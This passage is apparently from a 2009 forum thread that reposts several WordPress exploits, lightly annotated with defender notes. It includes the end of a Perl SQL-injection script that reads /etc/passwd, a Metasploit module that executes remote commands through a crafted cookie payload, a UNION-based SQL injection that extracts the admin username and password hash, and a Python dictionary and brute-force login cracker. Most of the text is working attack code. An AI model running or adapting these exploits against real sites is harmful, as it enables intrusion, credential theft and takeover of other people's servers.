    } #IF database is running as root, lets rip it apart

    # Only when the blog runs as root: LOAD_FILE of /etc/passwd (0x2f6574632f706173737764
    # is "/etc/passwd" in hex), which additionally requires the FILE privilege.
    # Defender note: everything after the hash dump depends on (a) SQL errors being echoed
    # to the client and (b) an over-privileged database account. A dedicated MySQL user
    # with grants only on the blog schema and no FILE privilege, plus non-verbose error
    # handling, confines this to the first stage even where the injection is unpatched.
    if ($hash_user =~m/root/) {
    print"\nThis deserves no mercy....\n Lets get the /etc/passwd\n.......imho...\n\n";

    my $sql4 = "mt.setPostCategories ".$postid." union all select load_file(0x2f6574632f706173737764) ".$username." ".$password." categoryId 1 categoryName Uncategorized isPrimary 0 ";
    my $req2 = new HTTP::Request POST => $host . "/xmlrpc.php";
    $req2->content($sql4);
    $res2 = $ua->request($req2);
    $out2 = $res2->content;


    @result3=split(/category_id =/,$out2);

    $hash=substr($result3[1],1,1600);

    print "Here is the /etc/passwd file:\n\n\n";
    print $hash;
    }

    exit;

    }

    }

    }

    aka_kludgeДата: Пятница, 05.06.2009, 12:07 | Сообщение # 5
    Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit)

    ##
    # Title: Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit)
    # Name: php_wordpress.pm
    # License: Artistic/BSD/GPL
    # Info: I lub metasploit yummmm (str0ke ! milw0rm.com).
    #
    # Recoded Kartoffelguru's php code for metasploit. I love cookies. /str0ke
    #
    #
    #
    # - This is an exploit module for the Metasploit Framework, please see
    # http://metasploit.com/projects/Framework for more information.
    #
    ##

    package Msf::Exploit::php_wordpress;
    use base "Msf::Exploit";
    use strict;
    use Pex::Text;
    use bytes;

    # No advanced options for this module.
    my $advanced = { };

    # Module metadata for the Perl-era (2.x) Metasploit framework. UserOpts entries are
    # [required, type, description, default]; 'Refs' MIL 1142 is presumably the milw0rm
    # id of the PHP exploit this module recodes (see header); 'Payload' requests a shell
    # command ('cmd'/'cmd_bash') of at most 512 bytes, which Exploit() wraps in passthru().
    my $info = {
    'Name' => 'Wordpress <= 1.5.1.3 Remote Code Execution eXploit',
    'Version' => '$Revision: 1.0 $',
    'Authors' => [ 'str0ke' ],
    'Arch' => [ ],
    'OS' => [ ],
    'Priv' => 0,
    'UserOpts' =>
    {
    'RHOST' => [1, 'ADDR', 'The target address'],
    'RPORT' => [1, 'PORT', 'The target port', 80],
    'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
    'RPATH' => [1, 'DATA', 'Path WordPress root directory', '/'],
    'SSL' => [0, 'BOOL', 'Use SSL'],
    },

    'Description' => Pex::Text::Freeform(qq{
    This module exploits a code execution exploit in wordpress blog <= 1.5.1.3.
    }),

    'Refs' =>
    [
    ['MIL', '1142'],
    ],

    'Payload' =>
    {
    'Space' => 512,
    'Keys' => ['cmd', 'cmd_bash'],
    },

    'Keys' => ['wordpress'],
    };

    sub new {
    # Constructor: hands this module's Info/Advanced tables (plus any extra
    # arguments) to the Msf::Exploit base constructor.
    my $class = shift;
    return $class->SUPER::new({ 'Info' => $info, 'Advanced' => $advanced }, @_);
    }

    # Builds and sends one GET whose Cookie header carries the whole attack. The cookie
    # appears to rely on cookie values populating WordPress's $wp_filter hook table and
    # the cache_lastpost* globals (register_globals-style): it registers base64_decode,
    # parse_str, get_lastpostmodified and preg_replace as 'query_vars' filters, so that
    # the base64 blob in cache_lastpostdate[server] -- which decodes to args[0]=eval(
    # base64_decode(<payload>)), with the payload being passthru("<cmd>") -- is handed to
    # preg_replace with the "//e" pattern (presumably the /e modifier). The raw response
    # is printed back. Defender note: a Cookie header containing "wp_filter[" or
    # "accepted_args" is a trivial detection signature; the module targets <= 1.5.1.3.
    sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $vhost = $self->GetVar('VHOST') || $target_host;
    my $path = $self->GetVar('RPATH');
    my $cmd = $self->GetVar('EncodedPayload')->RawPayload;

    # Inner PHP: passthru() of the command, base64'd with newlines stripped.
    my $encoded = Pex::Text::Base64Encode("passthru(\"$cmd\");");
    $encoded =~ s/\n//gm;

    # Re-express the base64 text as chr(..).chr(..) so the inner string needs no quotes.
    my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $encoded));

    $byte.=".chr(32)";

    # Outer layer: the query string parse_str() will see, base64'd again for the cookie.
    my $str = Pex::Text::Base64Encode('args[0]=eval(base64_decode('.$byte.')).die()&args[1]=x');

    $str =~ s/\n//gm;

    my $data = "wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_filter[query_vars][0][0][accepted_args]=0;".
    "wp_filter[query_vars][0][1][function]=base64_decode;wp_filter[query_vars][0][1][accepted_args]=1;".
    "cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=$str".
    ";wp_filter[query_vars][1][0][function]=parse_str;wp_filter[query_vars][1][0][accepted_args]=1;".
    "wp_filter[query_vars][2][0][function]=get_lastpostmodified;wp_filter[query_vars][2][0][accepted_args]=0;".
    "wp_filter[query_vars][3][0][function]=preg_replace;wp_filter[query_vars][3][0][accepted_args]=3;";

    my $req =
    "GET $path HTTP/1.0\r\n".
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\r\n".
    "Host: $vhost:$target_port\r\n".
    "Pragma: no-cache\r\n".
    "Accept: */*\r\n".
    "Cookie: $data\r\n".
    "\r\n";

    my $s = Msf::Socket::Tcp->new(
    'PeerAddr' => $target_host,
    'PeerPort' => $target_port,
    'LocalPort' => $self->GetVar('CPORT'),
    'SSL' => $self->GetVar('SSL'),

    );

    # NOTE(review): the two PrintLine strings below each began with a "[*]" marker that
    # the forum rendered as a bullet, splitting the string literals across lines.
    if ($s->IsError){
    $self->PrintLine('

  • Error creating socket: ' . $s->GetError);
    return;
    }

    $self->PrintLine("

  • Sending the malicious WordPress Get request...");

    $s->Send($req);

    # Read whatever the server returns (20 s timeout) and show it verbatim.
    my $results = $s->Recv(-1, 20);
    $s->Close();
    $self->PrintLine($results);

    return;
    }

    1;  # a Perl module file must end with a true value

    aka_kludgeДата: Пятница, 05.06.2009, 12:09 | Сообщение # 6
    WordPress <= 1.5.1.1 SQL Injection Exploit

    #!/usr/bin/perl -w
    #
    # SQL Injection Exploit for WordPress <= 1.5.1.1
    # This exploit shows the username of the administrator of the blog and his
    # password crypted in MD5, you must only choose the correct version of the target
    # Related advisory: http://www.gentoo.org/security/en/glsa/glsa-200506-04.xml
    # Patch: download the last version at http://wordpress.org/download/
    # Coded by Alberto Trivero

    use LWP::Simple;

    print "\n\t====================================\n";
    print "\t= Exploit for WordPress <= 1.5.1.1 =\n";
    print "\t= by Alberto Trivero =\n";
    print "\t====================================\n\n";

    # argv[0]: blog URL (must contain "http"); argv[1]: 1 or 2, selecting the query
    # shape for the target version as described in the usage text.
    if(!$ARGV[0] or !($ARGV[0]=~m/http/) or !($ARGV[1]==1 or $ARGV[1]==2)) {
    print "Usage:\nperl $0 [full_target_path] [target_version: 1 OR 2]\nVersion 1: WordPress <= 1.5\nVersion 2: WordPress 1.5.1 - 1.5.1.1\n\n";
    print "Examples:\nperl $0 http://www.example.com/wordpress/ 2\n";
    exit(0);
    }

    # Both variants inject through the index.php "cat" query parameter. Version 1 breaks
    # out with a double-URL-encoded quote (%2527) and a single-column UNION; version 2
    # uses a numeric context (cat=999) and a five-column UNION. Each returns
    # CONCAT(':', user_pass, ':', user_login, ':') from wp_users. Only the line for the
    # chosen version runs (statement-modifier `if`).
    # Defender note: the root cause is the cat value reaching SQL unescaped; the header's
    # remedy is upgrading to the patched release.
    $page=get($ARGV[0]."index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*") || die "[-] Unable to retrieve: $!" if($ARGV[1]==1);
    $page=get($ARGV[0]."index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*") || die "[-] Unable to retrieve: $!" if($ARGV[1]==2);
    print "[+] Connected to: $ARGV[0]\n";
    # Locate the ":<32 hex>:<login>:" marker in the page; $1 = hash, $2 = login.
    $page=~m/:([a-f0-9]{32}):(.*?):/;
    print "[+] Username of administrator is: $2\n" if($2);
    print "[+] MD5 hash of password is: $1\n" if($1);
    print "[-] Unable to retrieve username\n" if(!$2);
    print "[-] Unable to retrieve hash of password\n" if(!$1);

     
    aka_kludgeДата: Пятница, 05.06.2009, 12:12 | Сообщение # 7
    Wordpress <= 2.x dictionnary & Bruteforce attack

    ############## Source code #####################
    #!usr/bin/python
    # Flaw found on Wordpress
    # that allow Dictionnary & Bruteforce attack
    # Greetz goes to : NeoMorphS, Tiky
    # Vendor : http://wordpress.org/
    # Found by : Kad (kadfrox (at) gmail (dot) com [email concealed] / #kadaj-diabolik (at) hotmail (dot) fr [email concealed])
    # NOTE(review): Python 2 code (print statements, urllib2); the shebang is missing its
    # leading slash, and the indentation of this listing has been flattened, presumably
    # by the forum, so block structure must be read from context.
    import urllib , urllib2, sys, string
    # Character set for the brute-force mode -- ASCII letters, punctuation and digits --
    # expanded into a list of single characters.
    tab = "%s%s%s"%( string.ascii_letters, string.punctuation, string.digits )
    tab = [ i for i in tab ]
    # Recursively extends `parent` by one character from `table` until `size` more
    # characters have been appended, POSTing each candidate as the password of the user
    # in sys.argv[2] to the module-level `server` URL (assigned in the main block below).
    # A response without "Incorrect password." is treated as a hit. Note that the hit
    # message references `mot`, a name that only the dictionary branch of the main block
    # assigns.
    def node( table, parent, size ):
    if size == 0:
    pass
    else:
    for c in table:
    string = "%s%s"%( parent, c )
    data = {'log': sys.argv[2],
    'pwd': string}
    print "[+] Testing : "+string
    request = urllib2.Request(server, urllib.urlencode(data))
    f = urllib2.urlopen(request).read()
    if not "Incorrect password." in f: print "[!] Password is : "+mot ; break
    node( table, string, size-1 )

    # Entry point of the brute-force mode: one node() recursion per starting character,
    # covering every string of length `size` over `table`.
    def bruteforce( table, size ):
    for c in table:
    node( table, c, size-1 )

    # CLI: argv[1] = login URL, argv[2] = user name, argv[3] = mode ("1": dictionary file
    # in argv[4]; "2": brute force with password length argv[4]).
    # NOTE(review): the usage text has lost its argument placeholders, presumably
    # stripped by the forum rendering.
    # Defender note: success is inferred only from the absence of "Incorrect password."
    # and nothing throttles the requests. Login rate limiting / lockout and a CAPTCHA
    # (as the author suggests below the listing) stop this, and a uniform error message
    # for bad user and bad password removes the "admin exists" oracle described there.
    if (len(sys.argv) < 3):
    print "Usage : float.py "
    print "\nDefault: User is 'admin'"
    print "Choice : 1} Dictionnary Attack, use dictionnary file"
    print " 2} Bruteforce Attack, use number of character for password"

    else:
    server = sys.argv[1]
    if sys.argv[3] == "1":
    # Dictionary mode: count the lines first, rewind, then read them back one by one.
    a , b = open(sys.argv[4],'r') , 0
    for lines in a: b = b + 1
    a.seek(0)
    c = 0
    while (c < b):
    mot = a.readline().rstrip()
    data = {'log': sys.argv[2],
    'pwd': mot}
    print "[+] Testing : "+mot
    request = urllib2.Request(server, urllib.urlencode(data))
    f = urllib2.urlopen(request).read()
    if not "Incorrect password." in f: print "[!] Password is : "+mot ; break
    else: c = c + 1 ; pass
    if sys.argv[3] == "2":
    # Brute-force mode over the `tab` character set.
    print "[-] Server is : "+server
    print "[-] User is : "+sys.argv[2]
    print "[-] Number of characters are : "+sys.argv[4]
    number = int(sys.argv[4])
    bruteforce( tab, number )
    ############## Source code #####################

    The problem is that, many times, the default user created is "admin", so you can try to crack its password; to stop that, you can use an image confirmation (CAPTCHA) or a limit on login attempts (for example, only 5 tests).

    To know whether "admin" is the default user, go to the login page (http://site.com/wp-login.php) and try login: admin, pass: test (or anything else).

    If "Wrong password" is printed on the page, the default user is admin, but if "Wrong Username" appears instead, then admin is not the default user.

    Kad'

     